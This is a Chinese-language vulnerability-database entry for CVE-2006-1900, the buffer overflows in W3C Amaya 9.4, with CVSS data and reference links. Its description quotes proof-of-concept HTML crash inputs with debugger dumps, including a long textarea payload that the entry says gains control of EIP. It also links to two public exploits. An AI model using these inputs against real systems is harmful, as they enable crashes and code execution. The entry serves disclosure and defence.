CVE-2006-1900 (CNNVD-200604-389)

HIGH 有利用代码
中文标题:
W3C Amaya多个远程溢出漏洞
英文标题:
Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions ...
CVSS分数: 7.6
发布时间: 2006-04-20 10:00:00
漏洞类型: 授权问题
状态: PUBLISHED
数据质量分数: 0.40
数据版本: v5
漏洞描述
中文描述:

W3C的Amaya是一个所见即所得的Web浏览器和认证程序。 Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。 以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃: > <colgroup compact="Ax200"> > [...] > <textarea rows="Ax200"> > eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420 > edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 > > 004edd61 03f3 add esi,ebx > 004edd63 a4 movsb > 004edd64 8b4500 mov eax,[ebp] > 004edd67 8b8c241c010000 mov ecx,[esp+0x11c] > 004edd6e 8b942418010000 mov edx,[esp+0x118] > 004edd75 50 push eax > 004edd76 51 push ecx > 004edd77 53 push ebx > 004edd78 52 push edx > 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20) > 004edd7e 53 push ebx > 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0) > 004edd84 83c428 add esp,0x28 > 004edd87 8bbc24fc000000 mov edi,[esp+0xfc] > 004edd8e 8b942400010000 mov edx,[esp+0x100] > FAULT ->004edd95 8b4240 mov eax,[edx+0x40] > ds:0023:41414181=???????? > 004edd98 83f844 cmp eax,0x44 > 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8) > 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57 > 004edda6 0f8465060000 je amaya+0xee411 (004ee411) > 004eddac 8b4500 mov eax,[ebp] > 004eddaf 8b8c2408010000 mov ecx,[esp+0x108] > 004eddb6 6aff push 0xff > 004eddb8 50 push eax > 004eddb9 51 push ecx > 004eddba 57 push edi > 004eddbb e8d33af1ff call amaya+0x1893 (00401893) > 004eddc0 83c410 add esp,0x10 > 004eddc3 5f pop edi > 004eddc4 5e pop esi > 004eddc5 5d pop ebp 这样就可以控制EIP: > <textarea rows= > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB> > eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472 > esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000 > Function: <nosymbols> > No prior disassembly possible > 42424242 ?? ??? > 42424244 ?? ??? > 42424246 ?? ??? > 42424248 ?? ??? > 4242424a ?? ??? > 4242424c ?? ??? 此外,以下代码段也可以导致Amaya 9.4崩溃: > <legend color="Ax200"> > eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000 > edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 > > 00516114 56 push esi > 00516115 57 push edi > 00516116 33ff xor edi,edi> 00516118 33f6 xor esi,esi > 0051611a 3bcf cmp ecx,edi > 0051611c 893d943df101 mov [amaya+0x1b13d94 > (01f13d94)],edi > 00516122 7511 jnz amaya+0x116135 (00516135) > 00516124 6a0a push 0xa > 00516126 e825d80500 call amaya+0x173950 (00573950) > 0051612b 83c404 add esp,0x4 > 0051612e 8bd7 mov edx,edi > 00516130 8bc6 mov eax,esi > 00516132 5f pop edi > 00516133 5e pop esi > 00516134 c3 ret > FAULT ->00516135 8b4134 mov eax,[ecx+0x34] > ds:0023:41414175=???????? > 00516138 3bc7 cmp eax,edi > 0051613a 74f2 jz amaya+0x11612e (0051612e) >

英文描述:

Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions including 8.x before 8.8.5, allow remote attackers to execute arbitrary code via a long value in (1) the COMPACT attribute of the COLGROUP element, (2) the ROWS attribute of the TEXTAREA element, and (3) the COLOR attribute of the LEGEND element; and via other unspecified attack vectors consisting of "dozens of possible snippets."

CWE类型:
(暂无数据)
标签:
dos multiple Thomas Waldegger OSVDB-24623 OSVDB-24624
受影响产品
厂商 产品 版本 版本范围 平台 CPE
w3c amaya 9.4 - - cpe:2.3:a:w3c:amaya:9.4:*:*:*:*:*:*:*
解决方案
中文解决方案:
(暂无数据)
英文解决方案:
(暂无数据)
临时解决方案:
(暂无数据)
参考链接
ADV-2006-1351 vdb-entry
cve.org
访问
20060412 [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 mailing-list
cve.org
访问
无标题 x_refsource_MISC
cve.org
访问
19670 third-party-advisory
cve.org
访问
17507 vdb-entry
cve.org
访问
24624 vdb-entry
cve.org
访问
amaya-various-attribute-bo(25791) vdb-entry
cve.org
访问
20060412 [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2 mailing-list
cve.org
访问
24623 vdb-entry
cve.org
访问
无标题 x_refsource_MISC
cve.org
访问
ExploitDB EDB-27639 EXPLOIT
exploitdb
访问
Download Exploit EDB-27639 EXPLOIT
exploitdb
访问
CVE Reference: CVE-2006-1900 ADVISORY
cve.org
访问
ExploitDB EDB-27640 EXPLOIT
exploitdb
访问
Download Exploit EDB-27640 EXPLOIT
exploitdb
访问
CVSS评分详情
7.6
HIGH
CVSS向量: AV:N/AC:H/Au:N/C:C/I:C/A:C
CVSS版本: 2.0
机密性
COMPLETE
完整性
COMPLETE
可用性
COMPLETE
时间信息
发布时间:
2006-04-20 10:00:00
修改时间:
2024-08-07 17:27:29
创建时间:
2025-11-11 15:32:33
更新时间:
2026-01-19 09:42:11
利用信息
此漏洞有可利用代码!
利用代码数量: 2
利用来源:
未知 未知
数据源详情
数据源 记录ID 版本 提取时间
CVE cve_CVE-2006-1900 2025-11-11 15:17:41 2025-11-11 07:32:33
NVD nvd_CVE-2006-1900 2025-11-11 14:51:48 2025-11-11 07:41:19
CNNVD cnnvd_CNNVD-200604-389 2025-11-11 15:08:51 2025-11-11 07:49:06
EXPLOITDB exploitdb_EDB-27639 2025-11-11 15:05:27 2025-11-11 08:23:41
EXPLOITDB exploitdb_EDB-27640 2025-11-11 15:05:27 2025-11-11 08:23:41
版本与语言
当前版本: v5
主要语言: EN
支持语言:
EN ZH
其他标识符:
:
:
:
:
安全公告
暂无安全公告信息
变更历史
v5 EXPLOITDB
2025-11-11 16:23:41
references_count: 13 → 15; tags_count: 4 → 5
查看详细变更
  • references_count: 13 -> 15
  • tags_count: 4 -> 5
v4 EXPLOITDB
2025-11-11 16:23:41
references_count: 10 → 13; tags_count: 0 → 4; data_sources: ['cnnvd', 'cve', 'nvd'] → ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
  • references_count: 10 -> 13
  • tags_count: 0 -> 4
  • data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
v3 CNNVD
2025-11-11 15:49:06
vulnerability_type: 未提取 → 授权问题; cnnvd_id: 未提取 → CNNVD-200604-389; data_sources: ['cve', 'nvd'] → ['cnnvd', 'cve', 'nvd']
查看详细变更
  • vulnerability_type: 未提取 -> 授权问题
  • cnnvd_id: 未提取 -> CNNVD-200604-389
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:19
severity: SeverityLevel.MEDIUM → SeverityLevel.HIGH; cvss_score: 未提取 → 7.6; cvss_vector: NOT_EXTRACTED → AV:N/AC:H/Au:N/C:C/I:C/A:C; cvss_version: NOT_EXTRACTED → 2.0; affected_products_count: 0 → 1; data_sources: ['cve'] → ['cve', 'nvd']
查看详细变更
  • severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
  • cvss_score: 未提取 -> 7.6
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:H/Au:N/C:C/I:C/A:C
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 1
  • data_sources: ['cve'] -> ['cve', 'nvd']